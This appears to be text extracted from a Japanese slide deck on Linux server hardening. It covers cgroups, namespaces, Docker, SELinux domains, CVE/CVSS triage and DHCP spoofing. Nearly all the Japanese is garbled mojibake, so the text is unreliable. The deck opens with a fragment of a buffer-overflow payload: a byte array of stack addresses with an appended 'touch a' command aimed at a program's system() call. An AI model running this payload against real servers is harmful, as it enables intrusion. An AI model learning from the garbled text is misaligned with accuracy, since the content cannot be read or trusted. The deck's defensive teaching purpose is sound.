uint8_t > command{ 't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00 }; for( size_t i = 0u; i != 10u; ++i ) std::copy( command.begin(), command.end(), std::back_inserter( data ) ); data.push_back( 0x0d ); ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ system() γΣϧεΫϦϓτ ߈ܸऀ͕όοϑΝΦʔόʔϥϯ͔Β ೚ҙͷॲཧͷ࣮ߦʹܨ͛Δ࠷΋खܰͳํ๏system()͸ தͰࢠϓϩηεΛੜ੒͍ͯ͠Δҝ ࢠϓϩηε͕ੜ੒ग़དྷͳ͍ͱ߈ܸ͕େม໘౗ʹͳΔ

$ g++ sample.c -o sample $ ./sample bin dev home
lib32 lost+found mnt proc run sys usr boot etc lib lib64 media opt root sbin tmp var ੒ޭ $ cgcreate -g pids:test $ cgset -r pids.max=1 test $ cgexec -g pids:test ./sample ࣦഊ $ #include <iostream> #include <cstdlib> int main() { if( system( "ls /" ) == 0 ) std::cout << "੒ޭ" << std::endl; else std::cout << "ࣦഊ" << std::endl; } system()͕ػೳ͢ΔͱϧʔτσΟϨΫτϦͷ಺༰Λදࣔ͢ΔϓϩάϥϜ ͬ͢ͽΜͰಈ͔͢ͱදࣔ͞ΕΔ testͱ͍͏໊લͷpidsʹؔ͢Δ৽͍͠cgroupΛ࡞Δ test಺ͷ࠷େϓϩηε਺Λ1ʹ͢Δ cgroupΛtestʹͯ͠ಈ͔͢ͱ system()ʹࣦഊ͢Δ

ͨͩ͜͠ͷ੍ݶΛ͔͚Δͱ αʔόͷຊདྷͷ༻్Ͱ΋ࢠϓϩηε͕࡞Εͳ͘ͳΔ ͜ͷख͕࢖͑Δͷ͸ ໌Β͔ʹࢠϓϩηεΛඞཁͱ͠ͳ͍αʔϏεʹݶΒΕΔ

devices cgroups ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ αʔό γΣϧ ىಈ ࠓ߈ܸऀ͸ҰൠϢʔβͰͷγΣϧͷىಈʹ੒ޭ͠ α΢ϯυσόΠεͷ੬ऑੑΛಥ͍ͯ rootΛऔΖ͏ͱ͍ͯ͠Δ
CVE-2017-15265 ߈ܸऀ ੬ऑͳ Linux

devices cgroups ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ αʔό γΣϧ ىಈ CVE-2017-15265 ߈ܸऀ ͜ͷάϧʔϓʹ͸α΢ϯυσόΠε͸͍Βͳ͍ഺͳͷͰ
α΢ϯυσόΠεΛ৮ͬͯ͸͍͚ͳ͍ ੬ऑͳ Linux ͜͏͍͏੍ݶΛ͋Β͔͡Ί͔͚Δࣄ͕Ͱ͖Δ

໊લۭؒ ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηε͔Β Կ͕ݟ͑Δ͔Λ੍ݶ͢Δ init!"!5*[agetty] #!busybox #!login!!!bash!!!top #!sshd!"!sshd!!!sshd!!!bash!!!pstree $ %!sshd!!!sshd!!!bash!!!vim %!udevd
ྫ: ͜ͷൣғͷϓϩηεʹ͸ ֎ͷϓϩηε͕ݟ͑ͳ͍ (PID໊લۭؒ) bash!!!vim ͜ͷ໊લۭؒʹͱͬͯͷPID1 ຊ౰ͷPID1

Ϛ΢ϯτ໊લۭؒ Ͳ͜ʹԿ͕Ϛ΢ϯτ͞Ε͍ͯΔ͔ͷ৘ใΛ ਌ϓϩηε͔Β෼཭͢Δ ਌ϓϩηε ࢠϓϩηε IPHF GVHB IPHF GVHB ਌ϓϩηε͔Βݟ͑Δ/hoge/fuga
ࢠϓϩηε͔Βݟ͑Δ/hoge/fuga chroot΍umountͱ૊Έ߹ΘͤΔࣄͰ ࢠϓϩηε͔Β਌ϓϩηεͷσΟϨΫτϦπϦʔͷଘࡏΛ ݟ͑ͳ͘͢Δࣄ͕Ͱ͖Δ

Ϛ΢ϯτ໊લۭؒ IPHF GVHB ߈ܸʹ࢖͑ͦ͏ͳ΋Μ͕ ͳΜ΋ͳ͍… αʔόΛಈ͔͢ͷʹඞཁͳ࠷খݶͷϑΝΠϧ͚͕ͩݟ͑Δ σΟϨΫτϦπϦʔΛ/ͱͯ͠αʔόΛಈ͔͢ࣄͰ ߈ܸऀͷબ୒ࢶΛڱΊΔࣄ͕Ͱ͖Δ ߈ܸऀ

UID໊લۭؒ ಛఆͷ໊લۭؒʹଐ͢ϓϩηεͷΈʹ ௨༻͢ΔrootΛ࡞Γग़͢ ߈ܸऀ Զ͸ࠓ͔Β rootͩ!

UID໊લۭؒ ಛఆͷ໊લۭؒʹଐ͢ϓϩηεʹͷΈ ௨༻͢ΔrootΛ࡞Γग़͢ ߈ܸऀ rootͷ໋ྩͩͧ! ͋ͳͨ͸ͦͷ◦ͷதͰͷΈ rootͳͷͰμϝͰ͢

໊લۭؒ ͜ͷଞʹ΋ ωοτϫʔΫͷઃఆ cgroupͷઃఆ ઀ଓͰ͖Δϓϩηεؒ௨৴ ։͍͍ͯΔϑΝΠϧσΟεΫϦϓλ ͳͲ৭Μͳ΋ͷΛ ਌ϓϩηεͱࢠϓϩηεͰผʹ͢Δࣄ͕Ͱ͖Δ

طʹ ؾ͍͍ͮͯΔ͔΋͠Εͳ͍͕

cgroupͱ໊લۭؒΛ׆༻ͯ͠ ਌ϓϩηεͱࢠϓϩηεʹݟ͑Δ෺ Ͱ͖ΔࣄΛ׬શʹ෼཭ͨ͠ͷ͕ LinuxͷίϯςφͰ͋Δ

਌ϓϩηεͱࢠϓϩηεͷ׬શͳ෼཭ͷઃఆΛ ؆୯ʹͰ͖ΔΑ͏ʹ͍ͯ͠Δͷ͕ ྲྀߦΓͷDockerͰ͋Δ https://www.docker.com/

ίϯςφͱϚΠΫϩαʔϏε cgroupͱ໊લۭؒ͸ϓϩηε୯ҐͰઃఆ͞ΕΔ 1ͭͷڊେͳϓϩηεͰ αʔϏεΛఏڙ͢ΔΑΓ ୯७ͳػೳΛఏڙ͢ΔαʔόΛ ωοτϫʔΫͰܨ͍Ͱ େ͖ͳαʔϏεΛ࡞Δํ͕ ݸʑͷϓϩηεʹ༩͑Δ ݖݶΛΑΓখ͘͢͞Δࣄ͕Ͱ͖Δ

ίϯςφͱϚΠΫϩαʔϏε ͜ͷΑ͏ͳߏ੒ʹͯ͋͠Δͱ ϓϩηεͷ͏ͪͷ1͕ͭ Ծʹ߈ܸऀͷखʹམͪͨͱͯ͠΋ ͦͷ࣌఺ͰͷӨڹΛ αʔϏε಺ͷݶΒΕͨྖҬʹ ͱͲΊΒΕΔ

ͨͩ͠ ͨ·ʹcgroupͱ໊લۭؒࣗମͷෆ۩߹Ͱ ߈ܸऀ͕ίϯςφͷ֎ʹ୤ग़Ͱ͖ͯ͠·͏ ੬ऑੑ͕ݟ͔ͭΔࣄ͕͋ΔͷͰ஫ҙ ྫ$7&

SELinuxΛ׆༻ͤΑ

ॴ༗ऀ: Bob άϧʔϓ: ΧϨʔಉ޷ձ ύʔϛογϣϯ: ॴ༗ऀͱ άϧʔϓϝϯόʔ͸ ಡΈॻ͖OK ݹయతͳ*NIXͷύʔϛογϣϯ ΧϨʔ԰৘ใ
Alice (ΧϨʔಉ޷ձձһ) "MJDF͞Μ͸άϧʔϓϝϯόʔ άϧʔϓϝϯόʔͷॻ͖ࠐΈ͸0, Linux OK ͋ͷϑΝΠϧʹ ॻ͖͍ͨ

͜ͷΑ͏ʹϢʔβ͕ࣗ෼Ͱ ৘ใΛʹΞΫηε͢ΔͨΊʹඞཁͳݖݶΛઃఆ͢Δ ΞΫηε੍ޚΛ ೚ҙΞΫηε੍ޚ ͱݺͿ

ॴ༗ऀ: Bob άϧʔϓ: ΧϨʔಉ޷ձ ύʔϛογϣϯ: ॴ༗ऀͱ άϧʔϓϝϯόʔ͸ ಡΈॻ͖OK ΧϨʔ԰৘ใ BobΛࣗশ͢Δ
߈ܸऀ #PC͞Μ͸ ϑΝΠϧͷॴ༗ऀ͔ͩΒ #PC͞ΜͷཁٻͳΒؒҧ͍ͳ͍ Linux ͋ͷϑΝΠϧΛ ࣺͯͨ͘ͳͬͨ OK ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

ॴ༗ऀ: Charlie άϧʔϓ: ΧϨʔಉ޷ձ ύʔϛογϣϯ: ୭Ͱ΋ಡΈॻ͖ࣗ༝ ۃൿ৘ใ Charlie $IBSMJF͞Μ͸ ϑΝΠϧͷॴ༗ऀ͔ͩΒ
$IBSMJF͞ΜͷཁٻͳΒؒҧ͍ͳ͍ Linux OK *NIXΑʔΘ͔ΒΜ 777ʹ͠ͱ͍ͯ ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

γεςϜ؅ཧऀ͕γεςϜશମʹ ηΩϡϦςΟཁ݅Λڧ੍͢Δ ڧ੍ΞΫηε੍ޚ ͕ཁΔ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏ Charlie͕ͲΜͳʹζϘϥͰ΋ γεςϜશମͷηΩϡϦςΟ͸อͨΕΔඞཁ͕͋Δ

୭͔ͩΒʙ͕Ͱ͖Δ ͱ͍͏ܗҎ֎ͷํ๏ʹΑΔΞΫηε੍ޚ͕ཁΔ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏ BobຊਓͱBobʹͳΓ͢·͢߈ܸऀΛ۠ผ͢Δʹ͸ ୭͔͸࢖͍෺ʹͳΒͳ͍

શͯͷϓϩηεʹ͸਌ࢠؔ܎͕͋Δ ͋Δ೔ͷBob͞Μͷϓϩηε Bob ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏ ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ Ոͷ૟আΛ͢Δ

ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ Ոͷ૟আΛ͢Δ Bob BobʹͳΓ͢·ͨ͠ ߈ܸऀ ϓϩηε͕߈ܸऀͷखʹམͪΔͱ ͜͏͍͏ঢ়ଶʹͳΔ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ Ոͷ૟আΛ͢Δ ϓϩηεʹυϝΠϯΛ͚ͭΑ͏ υϝΠϯ͸͋Β͔͡Ί༻ҙ͞Εͨϧʔϧʹैͬͯ෇༩͞Ε ࢠϓϩηεʹҾ͖ܧ͕Ε SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍ Bob ૟আத ૟আத ͜Ε
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

૟আத ʹΞΫηεͯ͠ྑ͍΋ͷ Ϧιʔεʹ΋υϝΠϯ(λΠϓ)Λ͚ͭΑ͏ SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ Ոͷ૟আΛ͢Δ Bob ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ BobʹͳΓ͢·ͨ͠ ߈ܸऀ ͢Δͱ߈ܸऀͷϓϩηε͸͜͏ͳΔ ૟আத ૟আத
૟আத ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

Linux ͳΜ͚ͩͲ ΧϨʔಉ޷ձͷϊʔτʹॻ͖ࠐΈͤͯ͞ ૟আ͍ͤ υϝΠϯͷෆҰகΛཧ༝ʹ ৘ใ΁ͷΞΫηεΛڋ൱Ͱ͖Δ BobʹͳΓ͢·ͨ͠ ߈ܸऀ ૟আத ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

ॏཁͳϙΠϯτ ୭͔ͩΒڐՄ͢Δ Ͱ͸ͳ͘ ԿΛ͍ͯ͠Δ࠷த͔ͩΒڐՄ͢Δ ʹͳ͍ͬͯΔ

Æ SELinux ύʔϛογϣϯ system_u:object_r: passwd_exec_t Bob ॴ༗ऀ: Bob ॴ༗ऀͷಡΈॻ͖OK ಡΜͰOK
㲔 SELinux passwd_exec_t ͸ಡΜͰྑ͍ ಡΜͰOK ૯ධ ಡΜͰOK ͋ͷϑΝΠϧ ݟͤͯ #PC͞Μ͕ࣗ෼Ͱ ઃఆͰ͖Δൣғ SELinux passwd_exec_t ͸࢖ͬͯ͸͍͚ͳ͍ ࢖༻ېࢭ ૯ධ ࢖༻ېࢭ 8080 8080൪ϙʔτΛ ࢖͍͍ͨͳ

$ sesearch --allow … allow passwd_t crack_db_t:dir { getattr ioctl
lock open read search }; allow passwd_t crack_db_t:file { getattr ioctl lock open read }; allow passwd_t default_context_t:dir { getattr open search }; allow passwd_t device_t:dir { getattr ioctl lock open read search }; … allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename setattr unlink write }; … allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read }; … allow user_t passwd_exec_t:file { execute getattr open read }; allow user_t passwd_t:process transition; … ҰൠϢʔβ͕ී௨ʹϩάΠϯ͖ͯͨ͠ঢ়گ͔Β passwd_exec_tʹଐ͢ίϚϯυΛ࣮ߦ͢Δࣄ͕Ͱ͖Δ passwd_tυϝΠϯ΁ͷભҠ͕ೝΊΒΕΔ passwd_exec_tʹ ଐ͢ίϚϯυͷ࣮ߦ࣌ʹ passwd_tʹભҠ͢Δ passwd_tυϝΠϯͰ͸passwdΛ࣮ߦ͢Δͷʹඞཁͳ΋ͷ͔͠৮Εͳ͍ passwd_tͷϓϩηε͸ shadow_tλΠϓͷ ύεϫʔυϑΝΠϧΛ৮ΕΔ

passwd ύεϫʔυϑΝΠϧ ਖ਼نͷϩάΠϯखॱͰ ೖ͖ͬͯͨϢʔβ ύεϫʔυͱ ؔ܎ͳ͍ ϑΝΠϧ shadow_t΁ͷΞΫηεݖ͕ͳ͍ ແؔ܎ͳϑΝΠϧ΁ͷ ΞΫηεݖ͕ͳ͍
passwd_tʹભҠ Bob ਖ਼نͷϩάΠϯखॱͰ ೖͬͯ͜ͳ͔ͬͨϢʔβ passwd_tʹ ભҠ͢Δݖݶ͕ͳ͍ shadow_t΁ͷ ΞΫηεݖ͕ͳ͍ BobʹͳΓ͢·͢߈ܸऀ passwd_t͸shadow_tΛ৮ΕΔ

SELinuxͷઃఆΛద੾ʹߦ͏ࣄͰ ߈ܸऀ͕ϓϩηεΛ৐ͬऔͬͨͱͯ͠΋ ͦͷӨڹΛ ͔ͦ͜ΒભҠͰ͖ΔυϝΠϯ͚ͩʹ ݶఆͰ͖Δ

SELinux͕ΞΫηεΛڋ൱͢Δͱ ҎԼͷΑ͏ͳΧʔωϧϩά͕ग़Δ audit: type=1400 audit(1521959710.081:83): avc: denied { setattr }
for pid=2168 comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file passwd_tҎ֎ͷυϝΠϯͰ࣮ߦ͞Εͨ ίϚϯυchmod͕ shadow_tλΠϓ͕͍ͭͨϑΝΠϧshadowͷ ύʔϛογϣϯΛॻ͖׵͑Α͏ͱͨ͠ҝ ڋ൱ͨ͠

audit: type=1400 audit(1521959710.081:83): avc: denied { setattr } for pid=2168
comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file ιϑτ΢ΣΞʹ͜ͷૢ࡞Λ͢΂͖ਖ਼౰ͳཧ༝͕͋Δ৔߹ ͦͷιϑτ΢ΣΞͷҝͷ৽͍͠υϝΠϯΛ࡞Ζ͏ ͦͷιϑτ΢ΣΞ͕ਖ਼ৗʹ࢖ΘΕΔͱ͖ʹ ͦͷυϝΠϯʹભҠͰ͖ΔݖݶΛ༩͑Α͏ ͦͷυϝΠϯʹඞཁͳૢ࡞Λߦ͏ݖݶΛ༩͑Α͏

࣮ࡍͷSELinuxͷઃఆखॱ͸௕͘ͳΔͷͰׂѪ ίϚϯυ΍ઃఆϑΝΠϧͷ࢖͍ํ͸ RedHatͷυΩϡϝϯτʹΑ͘·ͱ·͍ͬͯΔ https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/ selinux_users_and_administrators_guide/ ͜͜ʹ 3FE)BUͷ4&-JOVYϢʔβʔͱ؅ཧऀͷΨΠυΛషΔ

RedHatҎ֎ͷσΟετϦϏϡʔγϣϯΛ࢖͏৔߹ γεςϜͷϢʔβ΍λΠϓ໊ɺͦͷݖݶͷൣғ͕ ҟͳ͍ͬͯΔՄೳੑ͕͋Δ ࢖༻͢ΔσΟετϦϏϡʔγϣϯʹ SELinuxʹؔ͢Δઆ໌͕͋Δ৔߹͸ ͦͪΒ΋ࢀর͢΂͠

੬ऑੑ৘ใͷ௥͍ํ

αʔό্Ͱಈ͍͍ͯΔͷ͕ ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ͚ͩ ͱ͍͏έʔε͸كͰ͋Δ ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ
ศརͳ ϥΠϒϥϦ Χʔωϧ(OS) υϥΠό υϥΠό ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ ศརͳϥΠϒϥϦ

ࣗ෼Ͱ࡞͍ͬͯͳ͍෦෼Ͱ੬ऑੑ͕ݟ͔ͭͬͯ ࣗ෼ͷιϑτ΢ΣΞ͕҆શͰͳ͘ͳΔ͜ͱ͸Α͋͘Δ ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ ศརͳ
ϥΠϒϥϦ Χʔωϧ υϥΠό υϥΠό ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ ศརͳϥΠϒϥϦ

ར༻͍ͯ͠Δ Αͦͷιϑτ΢ΣΞͷ ੬ऑੑ৘ใΛؾʹ͔͚Α͏

Common Vulnerabilities and Exposures ڞ௨੬ऑੑࣝผࢠ ུͯ͠$7& ੈքதͰݟ͔ͭͬͨ੬ऑੑʹ Ұҙͳ*%ΛׂΓ౰ͯͯσʔλϕʔεԽ͍ͯ͠Δ http://www.cve.mitre.org/ ͜͜ʹ
$7&ͷ8FCαΠτͷτοϓϖʔδΛషΔ

Common Vulnerabilities and Exposures BQBDIFͰݕࡧΛ͔͚ͯΈͨͱ͜Ζ http://www.cve.mitre.org/cve/search_cve_list.html ͜͜ʹ $7&ͷ8FCαΠτͰBQBDIFͰݕࡧΛ͔͚ͨͱ͜ΖΛషΔ

͜͜ʹ $7&ͷ/*45ʹΑΔղઆΛషΔ Common Vulnerabilities and Exposures "QBDIFIUUQEͷIUBDDFTTʹ-JNJUΛઃఆ͍ͯ͠Δ৔߹ʹ ϦϞʔτ͔Βݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏Մೳੑ͕͋Δ੬ऑੑ 6TFBGUFSGSFF੬ऑੑͰ͋Γ ඞͣ͠΋ݟ͑ͯ͸͍͚ͳ͍৘ใ͕ૹΒΕΔ༁Ͱ͸ͳ͍
https://nvd.nist.gov/vuln/detail/CVE-2017-9798

Common Vulnerability Scoring System https://nvd.nist.gov/vuln/detail/CVE-2017-9798 ڞ௨੬ऑੑධՁγεςϜ(ུͯ͠CVSS) ੬ऑੑͷϠό͞Λ਺஋ʹͨ͠΋ͷ ͜ΕΛݟΕ͹੬ऑੑͷ࢓૊Έ͕Θ͔Βͳͯ͘΋ Ͳͷ͘Β͍·͍ͣࣄʹͳ͍ͬͯΔ͔͕Θ͔Δ ͜͜ʹ
$7&ͷ$744ΛషΔ

Common Vulnerability Scoring System جຊධՁج४(Base Metrics) ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ ݱঢ়ධՁج४ (Temporal
Metrics) ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ ؀ڥධՁج४(Environmental Metrics) ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ

Common Vulnerability Scoring System جຊධՁج४(Base Metrics) ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ ݱঢ়ධՁج४ (Temporal
Metrics) ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ ؀ڥධՁج४(Environmental Metrics) ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ ͜͜ʹ $7&ͷ$744ΛషΔ ࣌ͱ৔ॴʹґΒͳ͍جຊධՁج४ͷείΞ͕ ੬ऑੑ৘ใͱͯ͠ެ։͞Ε͍ͯΔ

جຊධՁج४ (Base Metrics) ߈ܸݩ۠෼(Access Vector) ߈ܸऀ͸Ͳ͔͜Β߈ܸΛߦ͏ඞཁ͕͋Δ͔ ϩʔΧϧ ಉҰηάϝϯτ ωοτϫʔΫͷͲ͔͜ΒͰ΋ ߈ܸ৚݅ͷෳࡶ͞(Access
Complexity) ߈ܸͰ͖Δঢ়ଶʹ͢Δͷ͸೉͍͔͠ ಛผͳઃఆ͕࢖ΘΕͯΔ͚࣌ͩ ࣄલʹԿ͔Λ஌͍ͬͯΔඞཁ͕͋Δ ඞཁͳಛݖϨϕϧ(Privileges Required) ߈ܸΛߦ͏ʹ͸Ͳͷఔ౓ͷݖݶ͕ඞཁ͔ ҰൠϢʔβݖݶ͕ඞཁ ؅ཧऀݖݶ͕ඞཁ

جຊධՁج४ (Base Metrics) Ϣʔβؔ༩Ϩϕϧ(User Interaction) ߈ܸΛ੒ཱͤ͞ΔͨΊʹਖ਼نͷϢʔβʹԿ͔Λͤ͞Δඞཁ͕͋Δ͔ ࡉ޻Λͨ͠8FCϖʔδΛ։͔ͤΔඞཁ͕͋Δ είʔϓ(Scope) ߈ܸΛड͚ͨίϯϙʔωϯτҎ֎΁ͷ߈ܸͷ଍͕͔Γʹ͞ΕΔՄೳੑ͕͋Δ͔ ΫϩεαΠτεΫϦϓςΟϯάͳͲ͕͜Εʹ֘౰͢Δ

جຊධՁج४ (Base Metrics) ׬શੑ΁ͷӨڹ(Integrity Impact) ߈ܸऀ͸ର৅ͷ৘ใΛվ᜵Ͱ͖Δ͔ վ᜵Ͱ͖Δ৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ Մ༻ੑ΁ͷӨڹ(Availability Impact) ߈ܸऀ͸αʔϏεΛఀࢭͤ͞Δࣄ͕Ͱ͖Δ͔
Ұ෦ͷػೳΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ ׬શʹఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ ػີੑ΁ͷӨڹ(Confidentiality Impact) ߈ܸऀʹݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏͔ ݟ͑ͯ͠·͏৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

͜͜ʹ $7&ͷ$744ΛషΔ Apach httpdͷ੬ऑੑCVE-2017-9798ͷ৔߹ ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ ߈ܸ͸؆୯ ߈ܸʹݖݶ͸ಛʹඞཁͳ͠ ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠ Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍ ػີ৘ใ͕࿙ΕΔ
৘ใͷվ͟Μ͸Ͱ͖ͳ͍ Մ༻ੑΛଛͶΔ͜ͱ͸Ͱ͖ͳ͍ ۓٸ౓: 7.5/10.0 (ߴ) ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏ https://nvd.nist.gov/vuln/detail/CVE-2017-9798

͜͜ʹ $7&ͷ$744ΛషΔ BINDͷ੬ऑੑCVE-2016-2776ͷ৔߹ ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ ߈ܸ͸؆୯ ߈ܸʹݖݶ͸ಛʹඞཁͳ͠ ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠ Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍ ৘ใ͸࿙Εͳ͍ ৘ใͷվ͟Μ͸Ͱ͖ͳ͍
Մ༻ੑΛ׬શʹଛͶΔࣄ͕Ͱ͖Δ ۓٸ౓: 7.5/10.0 (ߴ) ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏ https://nvd.nist.gov/vuln/detail/CVE-2016-2776

͜͜ʹ $7&ͷ$744ΛషΔ Firefoxͷ੬ऑੑCVE-2016-5253ͷ৔߹ ϩʔΧϧ͔Β߈ܸͰ͖Δ ߈ܸ͸؆୯Ͱ͸ͳ͍ ҰൠϢʔβݖݶ͕ཁΔ ϢʔβʹԿ͔ͤ͞Δඞཁ͸ͳ͠ Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍ ৘ใ͸࿙Εͳ͍ ػີ৘ใͷվ͟Μ͕Ͱ͖Δ
Մ༻ੑΛଛͶΔࣄ͸Ͱ͖ͳ͍ ۓٸ౓: 4.7/10.0 (த) ੬ऑੑʹ͸ҧ͍ͳ͍͚ͲϠό͍΍ͭͰ͸ͳͦ͞͏ https://nvd.nist.gov/vuln/detail/CVE-2016-5253

͜͜ʹ SFEIBUͷ੬ऑੑ৘ใͷϖʔδΛషΔ ۓٸ౓ͷߴ͍੬ऑੑ͕ݟ͔ͭΔͱ֤σΟετϦϏϡʔγϣϯ͔Β Ͳ͏͢Ε͹࠹͛Δ͔ʹؔ͢Δ৘ใ͕ग़Δ https://access.redhat.com/security/cve/cve-2016-2776 https://security-tracker.debian.org/tracker/CVE-2016-2776 ͜͜ʹ EFCJBOͷ੬ऑੑ৘ใͷϖʔδΛషΔ

࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑʹCVE ID͕ৼΒΕͨ ͦͷIDʹ͍ͭͯৄࡉ͕ग़͍ͯͳ͍͔άάΖ͏ ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑͷৄࡉ͕ग़͍ͯͨ CVSSΛݟͯӨڹΛධՁ͠Α͏ σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ͳ͔ͳ͔ग़ͳ͍ ੬ऑੑͷৄࡉΛݟͯ ໰୊ͷػೳΛආ͚ͯαʔϏεΛఏڙͰ͖ͳ͍͔ݕ౼͠Α͏ σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ग़ͨ ૣٸʹΞοϓσʔτ͠Α͏

௨৴ʹର͢Δ߈ܸʹඋ͑Δ

8J'J Πϯλʔωοτ ઀ଓઌ ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢ Alice

8J'J Πϯλʔωοτ ઀ଓઌ ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢ ֎ʹग़Δʹ͸ Ͳ͜ʹ௨৴Λ౤͛Ε͹ ྑ͍Ͱ͔͢ ͦΕ͸ DHCP DISCOVER
ѱҙ͋Δୈࡾऀ ͬͪͩ͜Α DHCP OFFER Alice

8J'J Πϯλʔωοτ ઀ଓઌ ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢ ѱҙ͋Δୈࡾऀ σʔλͷྲྀΕ ͜ͷΑ͏ͳ߈ܸ͸DHCPεϓʔϑΟϯάͱݺ͹ΕΔ Alice

